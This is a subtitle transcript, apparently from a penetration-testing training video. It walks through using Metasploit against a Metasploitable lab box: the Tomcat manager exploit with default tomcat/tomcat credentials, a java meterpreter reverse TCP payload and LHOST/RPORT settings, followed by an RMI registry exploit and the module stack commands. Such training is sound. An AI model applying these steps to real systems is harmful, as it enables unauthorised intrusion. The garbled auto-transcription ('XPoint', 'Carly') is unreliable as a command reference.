1
00:00:00,590 --> 00:00:02,660
‫Now, when you're finished with an XPoint.

2
00:00:03,650 --> 00:00:08,630
‫You can pick another one directly by using the U.S command like this.

3
00:00:10,270 --> 00:00:16,270
‫Or you can use the back and then utilize the new one by the EU's command.

4
00:00:17,710 --> 00:00:19,270
‫That's pretty much how I work.

5
00:00:20,270 --> 00:00:22,460
‫Then show the exploit options.

6
00:00:23,770 --> 00:00:28,870
‫Now, for this point, I will define a payload by setting the payload variable.

7
00:00:30,310 --> 00:00:33,250
‫Set payload java.

8
00:00:34,270 --> 00:00:38,680
‫Met Interpretor Reverse TCAP.

9
00:00:40,860 --> 00:00:49,620
‫So I don't set the host variable, but in the previous video, I define it as a global variable named.

10
00:00:51,360 --> 00:01:01,050
‫And also, there are some new variables under this payload section L. host and L Port because I chose

11
00:01:01,050 --> 00:01:03,090
‫a reverse TCP connection.

12
00:01:04,060 --> 00:01:09,640
‫Which means that after a successful exploitation, the target will connect back to me.

13
00:01:10,550 --> 00:01:21,270
‫So our host in this context is the IP address of Carly and Al Port is the port that is ready to connect

14
00:01:21,590 --> 00:01:22,160
‫to Carly.

15
00:01:23,240 --> 00:01:28,110
‫Its default value is four four four four, and I don't want to change that.

16
00:01:28,850 --> 00:01:33,430
‫I will only set the host to 10, not 10.

17
00:01:33,470 --> 00:01:35,360
‫Not to not one one.

18
00:01:36,480 --> 00:01:46,050
‫Then said HTP password to Tomcat, said HTP username to Tomcat.

19
00:01:47,210 --> 00:01:50,870
‫Now, it isn't necessary, but I can set the target to zero.

20
00:01:51,920 --> 00:01:58,670
‫Or I forgot the airport, so let's set the iReport to 80, 180.

21
00:02:00,420 --> 00:02:02,490
‫OK, so let me check it one more time.

22
00:02:03,760 --> 00:02:05,220
‫OK, yeah, everything looks good.

23
00:02:06,580 --> 00:02:08,140
‫Now exploit.

24
00:02:09,920 --> 00:02:16,010
‫So it doesn't take too much time and I have the interpreter session on Matus voidable to.

25
00:02:17,880 --> 00:02:22,440
‫But this time, let's have a look at the user Tomcat 55.

26
00:02:23,330 --> 00:02:25,220
‫It is not the route user.

27
00:02:25,990 --> 00:02:30,350
‫So this means actually you don't have a high privileged shell.

28
00:02:31,160 --> 00:02:37,790
‫So I'm going to send this session to the background by using the interpreter command.

29
00:02:39,220 --> 00:02:42,110
‫So this is my session's list in the background.

30
00:02:42,910 --> 00:02:45,400
‫OK, so I want to show you a couple more command.

31
00:02:46,630 --> 00:02:53,470
‫Push em and pop em, push em will push the current module to stack.

32
00:02:54,160 --> 00:03:01,480
‫Now I will push this XPoint to stack, then I can pick another one RMI registry XPoint.

33
00:03:02,780 --> 00:03:10,100
‫And I'll run it and I get another session, so as you can see here, I am working with RMI Registry

34
00:03:10,100 --> 00:03:19,610
‫exploit with the pop em, I'll pop the last module from the stack and it's the Tomcat manager exploit,

35
00:03:19,610 --> 00:03:21,650
‫as you see here on your screen.

36
00:03:21,860 --> 00:03:29,510
‫So I'll advise you to do this, because when you're doing some really quick exploitation, those last

37
00:03:29,510 --> 00:03:32,600
‫two commands come in super handy.